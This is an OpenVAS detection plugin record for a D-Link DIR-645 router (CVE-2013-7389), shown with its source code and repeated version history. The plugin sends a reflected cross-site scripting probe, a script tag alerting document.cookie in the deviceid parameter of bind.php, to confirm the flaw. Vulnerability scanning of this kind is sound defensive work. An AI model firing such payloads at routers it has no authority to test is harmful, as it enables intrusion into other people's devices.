ID OPENVAS:1361412562310803730 Type openvas Reporter Copyright (C) 2013 Greenbone Networks GmbH Modified 2018-10-12T00:00:00
Description
This host is running D-Link DIR-645 Router and is prone to multiple
vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_dlink_dir645_mult_vuln.nasl 11865 2018-10-12 10:03:43Z cfischer $
#
# D-Link DIR-645 Router Multiple Vulnerabilities
#
# Authors:
# Antu Sanadi <santu@secpod.com>
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.803730");
script_version("$Revision: 11865 $");
script_cve_id("CVE-2013-7389");
script_bugtraq_id(61579);
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_tag(name:"last_modification", value:"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $");
script_tag(name:"creation_date", value:"2013-08-05 15:17:38 +0530 (Mon, 05 Aug 2013)");
script_name("D-Link DIR-645 Router Multiple Vulnerabilities");
script_tag(name:"summary", value:"This host is running D-Link DIR-645 Router and is prone to multiple
vulnerabilities.");
script_tag(name:"vuldetect", value:"Send a crafted data via HTTP request and check whether it is able to read
the cookie or not.");
script_tag(name:"solution", value:"Upgrade to version 1.04B11, or higher.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"insight", value:"Multiple flaws are due to,
- Buffer overflow in post_login.xml, hedwig.cgi and authentication.cgi
When handling specially crafted requests.
- Input passed to the 'deviceid' parameter in bind.php, 'RESULT' parameter
in info.php and 'receiver' parameter in bsc_sms_send.php is not properly
sanitised before being returned to the user.");
script_tag(name:"affected", value:"D-Link DIR-645 firmware version 1.04 and prior");
script_tag(name:"impact", value:"Successful exploitation will allow attacker to cause denial of service or
execute arbitrary HTML and script code in a user's browser session in context of an affected website.");
script_xref(name:"URL", value:"http://seclists.org/bugtraq/2013/Aug/17");
script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/27283");
script_xref(name:"URL", value:"http://seclists.org/bugtraq/2013/Aug/17");
script_xref(name:"URL", value:"http://packetstormsecurity.com/files/122659");
script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/527705");
script_xref(name:"URL", value:"http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt");
script_xref(name:"URL", value:"http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_vul");
script_copyright("Copyright (C) 2013 Greenbone Networks GmbH");
script_family("Web application abuses");
script_dependencies("gb_get_http_banner.nasl");
script_require_ports("Services/www", 8080);
script_mandatory_keys("DIR-645/banner");
script_xref(name:"URL", value:"http://www.dlink.com/ca/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:8080);
banner = get_http_banner(port: port);
if(banner && "DIR-645" >!< banner){
exit(0);
}
req = http_get(item: "/", port:port);
res = http_send_recv(port:port,data:req);
if(">D-LINK SYSTEMS" >< res && ">DIR-645<" >< res)
{
url = '/parentalcontrols/bind.php?deviceid="><script>alert' +
'(document.cookie)</script><';
if(http_vuln_check(port:port, url:url, check_header:TRUE,
pattern:"><script>alert\(document.cookie\)</script><",
extra_check:make_list("OpenDNS", "overriteDeviceID")))
{
report = report_vuln_url( port:port, url:url );
security_message(port:port, data:report);
exit(0);
}
}
exit(99);
{"id": "OPENVAS:1361412562310803730", "bulletinFamily": "scanner", "title": "D-Link DIR-645 Router Multiple Vulnerabilities", "description": "This host is running D-Link DIR-645 Router and is prone to multiple\n vulnerabilities.", "published": "2013-08-05T00:00:00", "modified": "2018-10-12T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803730", "reporter": "Copyright (C) 2013 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/archive/1/527705", "http://seclists.org/bugtraq/2013/Aug/17", "http://www.dlink.com/ca/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000", "http://packetstormsecurity.com/files/122659", "http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities", "http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt", "http://www.exploit-db.com/exploits/27283"], "cvelist": ["CVE-2013-7389"], "type": "openvas", "lastseen": "2019-05-29T18:38:15", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-7389"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running D-Link DIR-645 Router and is prone to multiple\n vulnerabilities.", "edition": 10, "enchantments": {"dependencies": {"modified": "2018-10-22T16:42:04", "references": [{"idList": ["CVE-2013-7389"], "type": "cve"}, {"idList": ["EDB-ID:27283"], "type": "exploitdb"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "5fbad5b6bcc37757da1dfb9f338751f4596634760da96e9b0de816033af3ebc0", "hashmap": [{"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "187a8f7ee1c6a893ef3cbf34f41753dd", "key": "pluginID"}, {"hash": "8be90a922e3fddc17514b9fd17f39e9b", "key": "modified"}, {"hash": "226057bac873999c3872aa502a5919bf", "key": "description"}, {"hash": "d149f5e5ce709fbaefea88324756b854", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "4cfeac0bf36a37570d558e060c9fe24a", "key": "href"}, {"hash": "974aeb74ca6ca783c94853e67d0440ff", "key": "published"}, {"hash": "eb0d3e4b46c4b283eb1ce082bbd5ff31", "key": "reporter"}, {"hash": "75c9e4b5d012a2b804fc5029d35dffc0", "key": "references"}, {"hash": "1ea4472ec0174fcbd5b919692fc5bf4b", "key": "cvelist"}, {"hash": "eb878f6ac90271b6f96dde9ea52a9763", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803730", "id": "OPENVAS:1361412562310803730", "lastseen": "2018-10-22T16:42:04", "modified": "2018-10-12T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310803730", "published": "2013-08-05T00:00:00", "references": ["http://www.securityfocus.com/archive/1/527705", "http://seclists.org/bugtraq/2013/Aug/17", "http://www.dlink.com/ca/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000", "http://packetstormsecurity.com/files/122659", "http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities", "http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt", "http://www.exploit-db.com/exploits/27283"], "reporter": "Copyright (C) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dlink_dir645_mult_vuln.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# D-Link DIR-645 Router Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803730\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-7389\");\n script_bugtraq_id(61579);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-05 15:17:38 +0530 (Mon, 05 Aug 2013)\");\n script_name(\"D-Link DIR-645 Router Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running D-Link DIR-645 Router and is prone to multiple\n vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP request and check whether it is able to read\n the cookie or not.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 1.04B11, or higher.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Buffer overflow in post_login.xml, hedwig.cgi and authentication.cgi\n When handling specially crafted requests.\n\n - Input passed to the 'deviceid' parameter in bind.php, 'RESULT' parameter\n in info.php and 'receiver' parameter in bsc_sms_send.php is not properly\n sanitised before being returned to the user.\");\n script_tag(name:\"affected\", value:\"D-Link DIR-645 firmware version 1.04 and prior\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to cause denial of service or\n execute arbitrary HTML and script code in a user's browser session in context of an affected website.\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/17\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/27283\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/17\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/122659\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/527705\");\n script_xref(name:\"URL\", value:\"http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"DIR-645/banner\");\n\n script_xref(name:\"URL\", value:\"http://www.dlink.com/ca/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port: port);\nif(banner && \"DIR-645\" >!< banner){\n exit(0);\n}\n\nreq = http_get(item: \"/\", port:port);\nres = http_send_recv(port:port,data:req);\n\nif(\">D-LINK SYSTEMS\" >< res && \">DIR-645<\" >< res)\n{\n url = '/parentalcontrols/bind.php?deviceid=\"><script>alert' +\n '(document.cookie)</script><';\n\n if(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:\"><script>alert\\(document.cookie\\)</script><\",\n extra_check:make_list(\"OpenDNS\", \"overriteDeviceID\")))\n {\n report = report_vuln_url( port:port, url:url );\n security_message(port:port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "title": "D-Link DIR-645 Router Multiple Vulnerabilities", "type": "openvas", "viewCount": 4}, "differentElements": ["cvss"], "edition": 10, "lastseen": "2018-10-22T16:42:04"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-7389"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running D-Link DIR-645 Router and is prone to multiple\n vulnerabilities.", "edition": 8, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "98163e81be3e529a04fe3d1ad00201bc584f5c951745187feddd8282df74f2f4", "hashmap": [{"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "187a8f7ee1c6a893ef3cbf34f41753dd", "key": "pluginID"}, {"hash": "226057bac873999c3872aa502a5919bf", "key": "description"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "4cfeac0bf36a37570d558e060c9fe24a", "key": "href"}, {"hash": "974aeb74ca6ca783c94853e67d0440ff", "key": "published"}, {"hash": "eb0d3e4b46c4b283eb1ce082bbd5ff31", "key": "reporter"}, {"hash": "227dedbbcf3ba7deed48e8685146b55c", "key": "sourceData"}, {"hash": "1ea4472ec0174fcbd5b919692fc5bf4b", "key": "cvelist"}, {"hash": "eb878f6ac90271b6f96dde9ea52a9763", "key": "title"}, {"hash": "880f1765cac6f927550c7bfacc926b72", "key": "modified"}, {"hash": "26e5f0ae9a9004e819cbc9ae7cb19d8b", "key": "references"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803730", "id": "OPENVAS:1361412562310803730", "lastseen": "2018-09-17T13:38:51", "modified": "2018-09-15T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310803730", "published": "2013-08-05T00:00:00", "references": ["http://www.securityfocus.com/archive/1/527705", "http://seclists.org/bugtraq/2013/Aug/17", "http://packetstormsecurity.com/files/122659", "http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities", "http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt", "http://www.exploit-db.com/exploits/27283"], "reporter": "Copyright (C) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dlink_dir645_mult_vuln.nasl 11401 2018-09-15 08:45:50Z cfischer $\n#\n# D-Link DIR-645 Router Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803730\");\n script_version(\"$Revision: 11401 $\");\n script_cve_id(\"CVE-2013-7389\");\n script_bugtraq_id(61579);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 10:45:50 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-05 15:17:38 +0530 (Mon, 05 Aug 2013)\");\n script_name(\"D-Link DIR-645 Router Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running D-Link DIR-645 Router and is prone to multiple\n vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP request and check whether it is able to read\n the cookie or not.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 1.04B11, or higher,\n For updates refer to http://www.dlink.com/ca/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Buffer overflow in post_login.xml, hedwig.cgi and authentication.cgi\n When handling specially crafted requests.\n\n - Input passed to the 'deviceid' parameter in bind.php, 'RESULT' parameter\n in info.php and 'receiver' parameter in bsc_sms_send.php is not properly\n sanitised before being returned to the user.\");\n script_tag(name:\"affected\", value:\"D-Link DIR-645 firmware version 1.04 and prior\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to cause denial of service or\n execute arbitrary HTML and script code in a user's browser session in context of an affected website.\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/17\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/27283\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/17\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/122659\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/527705\");\n script_xref(name:\"URL\", value:\"http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"DIR-645/banner\");\n\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = \"\";\nreq = \"\";\nres = \"\";\nbanner = \"\";\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port: port);\nif(banner && \"DIR-645\" >!< banner){\n exit(0);\n}\n\nreq = http_get(item: \"/\", port:port);\nres = http_send_recv(port:port,data:req);\n\nif(\">D-LINK SYSTEMS\" >< res && \">DIR-645<\" >< res)\n{\n url = '/parentalcontrols/bind.php?deviceid=\"><script>alert' +\n '(document.cookie)</script><';\n\n if(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:\"><script>alert\\(document.cookie\\)</script><\",\n extra_check:make_list(\"OpenDNS\", \"overriteDeviceID\")))\n {\n report = report_vuln_url( port:port, url:url );\n security_message(port:port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "title": "D-Link DIR-645 Router Multiple Vulnerabilities", "type": "openvas", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 8, "lastseen": "2018-09-17T13:38:51"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-7389"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running D-Link DIR-645 Router and is prone to multiple\n vulnerabilities.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "c1380c18595c64a3622ee9160b2284c4a35112617eb754911bbb7df94a10fa17", "hashmap": [{"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "187a8f7ee1c6a893ef3cbf34f41753dd", "key": "pluginID"}, {"hash": "226057bac873999c3872aa502a5919bf", "key": "description"}, {"hash": "602bced6320cec4ab33d131e0b746b65", "key": "modified"}, {"hash": "07e4d6d40d6296add31ad3bfb609073a", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "4cfeac0bf36a37570d558e060c9fe24a", "key": "href"}, {"hash": "974aeb74ca6ca783c94853e67d0440ff", "key": "published"}, {"hash": "eb0d3e4b46c4b283eb1ce082bbd5ff31", "key": "reporter"}, {"hash": "1ea4472ec0174fcbd5b919692fc5bf4b", "key": "cvelist"}, {"hash": "eb878f6ac90271b6f96dde9ea52a9763", "key": "title"}, {"hash": "26e5f0ae9a9004e819cbc9ae7cb19d8b", "key": "references"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803730", "id": "OPENVAS:1361412562310803730", "lastseen": "2017-07-27T10:51:50", "modified": "2017-07-12T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310803730", "published": "2013-08-05T00:00:00", "references": ["http://www.securityfocus.com/archive/1/527705", "http://seclists.org/bugtraq/2013/Aug/17", "http://packetstormsecurity.com/files/122659", "http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities", "http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt", "http://www.exploit-db.com/exploits/27283"], "reporter": "Copyright (C) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dlink_dir645_mult_vuln.nasl 6698 2017-07-12 12:00:17Z cfischer $\n#\n# D-Link DIR-645 Router Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803730\");\n script_version(\"$Revision: 6698 $\");\n script_cve_id(\"CVE-2013-7389\");\n script_bugtraq_id(61579);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 14:00:17 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-05 15:17:38 +0530 (Mon, 05 Aug 2013)\");\n script_name(\"D-Link DIR-645 Router Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running D-Link DIR-645 Router and is prone to multiple\n vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP request and check whether it is able to read\n the cookie or not.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 1.04B11, or higher,\n For updates refer to http://www.dlink.com/ca/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n - Buffer overflow in post_login.xml, hedwig.cgi and authentication.cgi\n When handling specially crafted requests.\n - Input passed to the 'deviceid' parameter in bind.php, 'RESULT' parameter\n in info.php and 'receiver' parameter in bsc_sms_send.php is not properly\n sanitised before being returned to the user.\");\n script_tag(name:\"affected\", value:\"D-Link DIR-645 firmware version 1.04 and prior\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to cause denial of service or\n execute arbitrary HTML and script code in a user's browser session in context of an affected website.\n\n Impact Level: Application\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/17\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/27283\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/17\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/122659\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/527705\");\n script_xref(name:\"URL\", value:\"http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"DIR-645/banner\");\n\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = \"\";\nreq = \"\";\nres = \"\";\nbanner = \"\";\n\n## Get HTTP Port\nport = get_http_port(default:8080);\n\n## Confirm the device from banner\nbanner = get_http_banner(port: port);\nif(banner && \"DIR-645\" >!< banner){\n exit(0);\n}\n\n## Send and Receive the response\nreq = http_get(item: \"/\", port:port);\nres = http_send_recv(port:port,data:req);\n\n## Confirm the device from response\nif(\">D-LINK SYSTEMS\" >< res && \">DIR-645<\" >< res)\n{\n url = '/parentalcontrols/bind.php?deviceid=\"><script>alert' +\n '(document.cookie)</script><';\n\n ## Check the response to confirm vulnerability\n if(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:\"><script>alert\\(document.cookie\\)</script><\",\n extra_check:make_list(\"OpenDNS\", \"overriteDeviceID\")))\n {\n report = report_vuln_url( port:port, url:url );\n security_message(port:port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "title": "D-Link DIR-645 Router Multiple Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-07-27T10:51:50"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-7389"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running D-Link DIR-645 Router and is prone to multiple\n vulnerabilities.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a88aec0b65add5e23bf4ecc6ab64e8c09b334279d5b5a6e27e8f9468435437a0", "hashmap": [{"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "c97c42dcc69ae013d7e59ce12c763f67", "key": "sourceData"}, {"hash": "704c887ec56b5c516fa7b02953bad633", "key": "modified"}, {"hash": "187a8f7ee1c6a893ef3cbf34f41753dd", "key": "pluginID"}, {"hash": "226057bac873999c3872aa502a5919bf", "key": "description"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "4cfeac0bf36a37570d558e060c9fe24a", "key": "href"}, {"hash": "974aeb74ca6ca783c94853e67d0440ff", "key": "published"}, {"hash": "eb0d3e4b46c4b283eb1ce082bbd5ff31", "key": "reporter"}, {"hash": "1ea4472ec0174fcbd5b919692fc5bf4b", "key": "cvelist"}, {"hash": "eb878f6ac90271b6f96dde9ea52a9763", "key": "title"}, {"hash": "26e5f0ae9a9004e819cbc9ae7cb19d8b", "key": "references"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803730", "id": "OPENVAS:1361412562310803730", "lastseen": "2018-09-05T11:40:12", "modified": "2018-09-04T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310803730", "published": "2013-08-05T00:00:00", "references": ["http://www.securityfocus.com/archive/1/527705", "http://seclists.org/bugtraq/2013/Aug/17", "http://packetstormsecurity.com/files/122659", "http://exploitsdownload.com/exploit/hardware/d-link-dir-645-103b08-multiple-vulnerabilities", "http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt", "http://www.exploit-db.com/exploits/27283"], "reporter": "Copyright (C) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dlink_dir645_mult_vuln.nasl 11223 2018-09-04 12:48:48Z cfischer $\n#\n# D-Link DIR-645 Router Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803730\");\n script_version(\"$Revision: 11223 $\");\n script_cve_id(\"CVE-2013-7389\");\n script_bugtraq_id(61579);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-04 14:48:48 +0200 (Tue, 04 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-05 15:17:38 +0530 (Mon, 05 Aug 2013)\");\n script_name(\"D-Link DIR-645 Router Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", 